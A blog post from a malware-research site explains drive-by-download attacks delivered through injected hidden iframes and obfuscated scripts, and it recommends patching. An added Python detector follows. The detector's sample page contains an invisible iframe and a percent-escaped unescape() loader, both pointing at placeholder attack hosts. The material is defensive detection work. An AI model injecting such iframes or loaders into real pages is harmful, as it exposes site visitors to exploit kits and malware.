MalwareIntelligence is a site dedicated to research on everything related to anti-malware security, computer criminology and information security in general, always from a perspective closely tied to the field of intelligence.

15.1.09

One of the most common problems in most information environments is poor management of security updates, both for the operating system and for the installed applications. With the same level of criticality, one of the most effective attacks that results from this lack of updating is the one carried out through the web, known as Drive-by-Download.

This attack is based on exploiting vulnerabilities in the visitor's software in order to run malicious code, and it is delivered by injecting iframe tags into the body of the HTML code of a page, similar to the example shown in the image:

The iframe tag loads in the background, transparently to the user, and opens a second page that usually contains an obfuscated script. Hidden inside that script are one or more exploits whose job is to probe the computer for specific vulnerabilities. When the user visits a malicious website, or a legitimate one compromised with these threats, what they see may be, for example, what is shown in the following screen (just a series of dots):

However, looking at the page source code, we see the real code that is maliciously hidden there. This attack technique poses a real risk: if a system has the characteristics the attack needs, that is, an unpatched version of the software the exploit targets, the attack will succeed. Therefore, the countermeasure that effectively mitigates these malicious actions is the timely installation of security updates, for both the operating system and the applications, the browser and its plugins included, since the exploits only work against versions that still contain the vulnerability.
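The "look at the page source" step above can be turned into a small check. The following Python script, added here as an illustration and not code from MalwareIntelligence, parses a page's HTML source and flags the two markers the post describes: iframes hidden from the user (zero size, hidden by CSS, or loading content from another host) and inline scripts obfuscated with percent-escapes and unescape()/eval(), decoding the escaped payload to show what the dropper would write into the page. The sample page, the shop.example page host and the .invalid hostnames are constructed placeholders, not real sites.

```python
"""
Static scan of a page's HTML source for drive-by-download markers:
hidden/off-site iframes and percent-escaped, unescape()/eval()-driven
inline scripts. Added illustration; the sample page is constructed and
every hostname in it is a placeholder.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# The payload a dropper would hide: here just another iframe tag,
# percent-escaped the way document.write(unescape('...')) loaders do it.
HIDDEN_PAYLOAD = '<iframe src="http://exploit-kit.invalid/in.php"></iframe>'
ESCAPED_PAYLOAD = "".join("%%%02X" % b for b in HIDDEN_PAYLOAD.encode())

# Constructed sample of a compromised page: legitimate content plus an
# injected hidden iframe and an obfuscated loader script.
SAMPLE_PAGE = f"""<html><head><title>Shop</title></head>
<body>
<p>Welcome to our store.</p>
<iframe src="http://bad-example.invalid/x.php" width="0" height="0" style="visibility: hidden"></iframe>
<script>document.write(unescape('{ESCAPED_PAYLOAD}'));</script>
</body></html>
"""


class PageParser(HTMLParser):
    """Collects iframe attributes and inline script bodies from the HTML."""

    def __init__(self):
        super().__init__()
        self.iframes = []   # list of attribute dicts, one per <iframe>
        self.scripts = []   # list of inline <script> bodies
        self._script = None  # buffer while inside a <script> element

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self.scripts.append("".join(self._script))
            self._script = None


def _dimension(value):
    """'0' or '1px' -> 0 or 1; missing or percentage values -> None."""
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value or "")
    return int(m.group(1)) if m else None


def iframe_reasons(attrs, page_host):
    """Why an iframe looks like a drive-by injection (empty list = nothing odd)."""
    reasons = []
    w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
    if w is not None and h is not None and w <= 1 and h <= 1:
        reasons.append("size %dx%d, invisible to the user" % (w, h))
    style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden by CSS")
    host = urlparse(attrs.get("src", "")).hostname
    if host and host != page_host:
        reasons.append("loads content from another host: " + host)
    return reasons


def script_reasons(body):
    """Why an inline script looks like an obfuscated dropper."""
    reasons = []
    if re.search(r"\b(eval|unescape)\s*\(", body):
        reasons.append("uses eval()/unescape()")
    escapes = re.findall(r"%[0-9A-Fa-f]{2}", body)
    if len(escapes) >= 20:  # heuristic threshold; legitimate code rarely has this many
        decoded = unquote("".join(escapes))
        reason = "%d percent-escaped bytes" % len(escapes)
        tags = sorted({t.lower() for t in
                       re.findall(r"<(iframe|script|object|embed)\b", decoded, re.I)})
        if tags:
            reason += ", decoding to a hidden " + "/".join(tags) + " tag"
        reasons.append(reason)
    return reasons


def scan(html, page_host):
    """Return [(element, reasons)] for every suspicious iframe or script."""
    parser = PageParser()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs in parser.iframes:
        reasons = iframe_reasons(attrs, page_host)
        if reasons:
            findings.append(("iframe " + attrs.get("src", "(no src)"), reasons))
    for body in parser.scripts:
        reasons = script_reasons(body)
        if reasons:
            findings.append(("inline script", reasons))
    return findings


if __name__ == "__main__":
    for element, reasons in scan(SAMPLE_PAGE, "shop.example"):
        print(element)
        for r in reasons:
            print("  -", r)
```

Run against the sample page it reports the 0x0, CSS-hidden, off-site iframe and the script whose escaped string decodes to a second iframe; a normal, visible iframe served from the page's own host produces no findings. The thresholds are heuristics, so treat a hit as something to inspect by hand, exactly as the post does by reading the source.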